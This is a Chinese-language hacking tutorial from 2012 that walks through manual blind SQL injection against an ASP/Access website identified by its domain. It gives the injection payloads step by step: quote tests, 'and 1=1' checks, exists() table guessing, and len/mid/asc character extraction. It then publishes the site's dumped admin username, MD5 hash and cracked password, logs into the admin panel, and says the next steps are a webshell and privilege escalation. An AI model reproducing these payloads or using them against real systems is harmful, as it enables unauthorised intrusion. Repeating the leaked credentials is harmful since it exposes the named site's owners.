2012最新网站手工注入详解教程

想起 苦学技术的梯子真是感慨万千，别人在背英语句子，而卧却在背数据库语句，同样都是英文 ，可为啥咱英语成绩还是不及格-- 
 
言归正传，现在sql注入工具可谓层出不穷，但是工具毕竟都是人写的，总会有不合适的地方，所以学会手工注入还是很重要的，今天的教程就给大家说说手工注入，新手一起来看，老鸟直接飞过好了。 
 
动态脚本语言（例 asp php aspx jsp等），总会与数据库关联，带入相应的变量来查询指定数据，当这种查询被我们控制时，也就形成了注入 
 
比如下面这个链接  
 
http://www.tri-cel.com/xwzx_jtdt_zzy.asp?id=1235 
 
很正常的URL，提交这个URL，假设服务器进行像select * from news id=''ID的查询语句（news为表名，ID是提交的参数），如果我们提交select * from news id=1235 and user>0这样的语句，肯定是无法执行 ，就会报错并给与相应的错误提示 
 
下面我们来看下  看到了 爆错了吧 
 
接下来就是实战了，判断是否是注入的，可以再参数后面加一个单引号'，如果是注入的，把语句带入数据库之后，语句中的单引号没有闭合，程序就会报错，根据报错的信息可以判断数据库类型，本次教程讲述acess注入，返回的信息有ODBC Microsoft Access Driver 这个时，就可以判定为acess数据库。 
 
注意一下，也可以用分号;或者--来让目标报错，这两个分别是mssql中的分离语句和注释语句的符号，在acess中会因为语句不通报错，当然，输入的时候必须要在中文状态下哈 
 
以上是符号判断，还可以用经典的 and 1=1  and 1=2注意一下 and的前面有个空格，通过这样的构造来报错，and在逻辑语言为 和 的意思，前后两语句，都为正确，则为真，返回正常，and前后有一个错，则为假，就会报错 
 
http://www.tri-cel.com/xwzx_jtdt_zzy.asp?id=1235%20and%201=1  返回正常  
 
http://www.tri-cel.com/xwzx_jtdt_zzy.asp?id=1235 and 1=2  报错了 
 
如果遇到参数像id=hacker这样的非数字，我们称之为字符型注入，这时候我们就用前面所说的去试，结果你会发现不行的，因为字符串类型不像数字型直接取之，需要用单引号包含起来，让他报错  'and' '1'=1 
'and' '1'=2 这样的 
这里没有准备字符串的，不做详细演示了，试了下数字的用这样不行哈 
 
教程继续....... 
 
接下来我们猜解表段数据，提交 and exists (select * from admin)返回正常，证明存在admin这个表段，提交 and exists (select * from admin1)报错了，就证明不存在admin1这个表段 
 
为了让大家更明白，我解释下每句的意思 
 
exists()作用是：如果是返回结果集，就为真，否则为假 
*是通配符，代表任意字符，即表示存在数据 
select * from admin表示：在admin表段中存在数据 ，即可知道有无admin表段，这个直接决定了exists()真假，就可以作出相应的判断了 
 
所以平时要多搜集些常用的表名，像我们在入侵是时候，一般都是找后台，因为权限。我们继续猜解admin下的字段 
 
把*替换为count(username)   
http://www.tri-cel.com/xwzx_jtdt_zzy.asp?id=1235 and exists (select count(username) from admin) 
刚才填写的出了点问题，菜鸟哈，见谅。返回了正常页面，说明username字段存在 
 
提交 and exists (select count(username1) from admin)返回错误，说明username1字段不存在 
 
解释下 
count()：返回指定的条件行数，存在字段，返回1，exists()为真，返回正常页面。不存在字段，返回0，程序报错。 
 
接着判断数据长度，用到如下语句： 
 
and (select top 1 len(username)from admin)>12 
返回正常，则代表username第一行长度大于12 
and (select top 1 len(username)from admin)>13  
返回错误，就代表username第一行长度不大于13，即小于等于。 
 
所以可以通过更改后面的数字确定长度 
and (select top 1 len(username)from admin)>数字 
 
被叫成username第一行长度即为13 
 
解释下 
 
len()这个函数是判断数据长度 
top 1表示第一行内容，同理猜解第二行 即top 2 
 
 
接下来就是判断内容了，我们用 mid(列名,n,1)来截取第n位字符，再用asc()函数转化为ASCII码 
 
and (select top 1 asc(mid(username,1,1))from admin)>97 
提交这样的信息，返回错误，就代表第一位ASCII码小于等于97 
and (select top 1 asc(mid(username,1,1))from admin)>96 
提交这样的信息，返回正确，就代表第一位ASCII码大于96 
 
教程中网站的ASCII码即97 
 
再用ascii转换工具把ASCII码转换为字符 抱歉工具有问题，我汗  没准备好 稍等 
 
教程继续  ASCII  97  转换  >>  a 
 
这里97转化为a，即第一位是a。 
同理判断出后面的字符 
 
and (select top 1 asc(mid(username,2,1))from admin)>97 
根据操作我们判断出来了 
ASCII  100  转换  >>  d 
接下来的我就不一一操作了 我这里已经猜解好了整个字段 的第一行  
我有找了下 发现了password表段 这里保存的是密码，接下来就是找后台了 
 
[password] : 01624cf92e696e77 
[username] : administrator 
 
01624cf92e696e77对于这样的密码有的朋友可能会直接去登陆后台，发现密码错误，实际上是使用了一种叫做MD5加密的方式，由于是不可逆的（具体自己百度），我们只能选择暴力破解或者去相关的网站查询，当然，如果管理员太BT，哪里都弄不到的，就要自己另辟蹊径了 
 
我这里推荐三个MD5解密网站 
 
www.cmd5.com 
www.md5.org.cn 
www.md5.com.cn 
 
查到了明文 
Md5:01624cf92e696e77 
Result: zxtx007 
 
我们在弄出后台 我这里用的明小子，其实怎么弄都差不多....出来后台就可以 
 
http://www.tri-cel.com/admin/index.asp 
这个就是后台登陆的页面了 我们用刚才注入得到的东西登陆下 
 
登陆成功 
 
接下来的就是拿webshell和提权